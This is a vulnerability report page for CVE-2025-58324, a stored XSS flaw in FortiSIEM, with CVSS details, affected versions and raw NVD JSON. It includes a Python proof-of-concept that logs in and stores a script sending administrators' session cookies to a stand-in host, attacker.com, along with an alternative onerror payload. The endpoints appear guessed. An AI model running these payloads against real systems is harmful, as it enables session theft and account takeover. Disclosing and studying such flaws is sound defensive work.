Security Vulnerability Report
中文
CVE-2025-58324 CVSS 6.4 MEDIUM

CVE-2025-58324

Published: 2025-10-14 16:15:41
Last Modified: 2025-10-14 20:25:09
Source: [email protected]

Description

An improper neutralization of input during web page generation vulnerability [CWE-79] in FortiSIEM 7.2.0 through 7.2.2, 7.1 all versions, 7.0 all versions, 6.7 all versions, 6.6 all versions, 6.5 all versions, 6.4 all versions, 6.3 all versions, 6.2 all versions may allow an authenticated attacker to perform a stored cross site scripting (XSS) attack via crafted HTTP requests.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:* - VULNERABLE
FortiSIEM 7.2.0
FortiSIEM 7.2.1
FortiSIEM 7.2.2
FortiSIEM 7.1(全版本)
FortiSIEM 7.0(全版本)
FortiSIEM 6.7(全版本)
FortiSIEM 6.6(全版本)
FortiSIEM 6.5(全版本)
FortiSIEM 6.4(全版本)
FortiSIEM 6.3(全版本)
FortiSIEM 6.2(全版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-58324 - FortiSIEM Stored XSS PoC # This PoC demonstrates a stored XSS attack via crafted HTTP requests # Target: FortiSIEM 7.2.0 - 7.2.2, 7.1.x, 7.0.x, 6.x all versions import requests # Configuration TARGET_URL = "https://fortisiem-target.example.com" USERNAME = "attacker_user" PASSWORD = "attacker_password" # Step 1: Authenticate to FortiSIEM session = requests.Session() login_url = f"{TARGET_URL}/phoenix/login" # Get login page to retrieve CSRF token response = session.get(login_url) # Perform login (adjust parameters based on FortiSIEM version) login_data = { "username": USERNAME, "password": PASSWORD, "csrfmiddlewaretoken": session.cookies.get("csrftoken", "") } response = session.post(login_url, data=login_data, verify=False) # Step 2: Inject malicious XSS payload via a stored field # Common injection points: incident description, report name, dashboard widget, rule description xss_payload = '<script>document.location="https://attacker.com/steal?cookie="+document.cookie</script>' # Example: Inject via incident/comment creation inject_url = f"{TARGET_URL}/phoenix/rest/event/incident/create" inject_data = { "incidentTitle": "Security Alert", "incidentDescription": f"Normal alert description {xss_payload}", "severity": "3", "csrfmiddlewaretoken": session.cookies.get("csrftoken", "") } headers = { "Content-Type": "application/x-www-form-urlencoded", "Referer": f"{TARGET_URL}/phoenix/" } response = session.post(inject_url, data=inject_data, headers=headers, verify=False) print(f"Injection Status: {response.status_code}") print(f"Payload stored: {xss_payload}") # Step 3: When an admin views the incident, the XSS executes # The malicious script steals the admin's session cookie # and redirects to the attacker's controlled server print("\n[!] XSS payload stored successfully.") print("[!] When a high-privilege user views this content, the payload will execute.") print("[!] Captured data will be sent to: https://attacker.com/steal") # Alternative payload using event handlers (bypasses some filters) alternative_payload = '"><img src=x onerror=alert(document.domain)>' print(f"\nAlternative payload: {alternative_payload}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58324", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:40.607", "lastModified": "2025-10-14T20:25:09.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper neutralization of input during web page generation vulnerability [CWE-79] in FortiSIEM 7.2.0 through 7.2.2, 7.1 all versions, 7.0 all versions, 6.7 all versions, 6.6 all versions, 6.5 all versions, 6.4 all versions, 6.3 all versions, 6.2 all versions may allow an authenticated attacker to perform a stored cross site scripting (XSS) attack via crafted HTTP requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.0", "versionEndExcluding": "7.2.3", "matchCriteriaId": "5619BB86-43BB-45D5-B197-ABA3C1E2EAEB"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-24-280", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.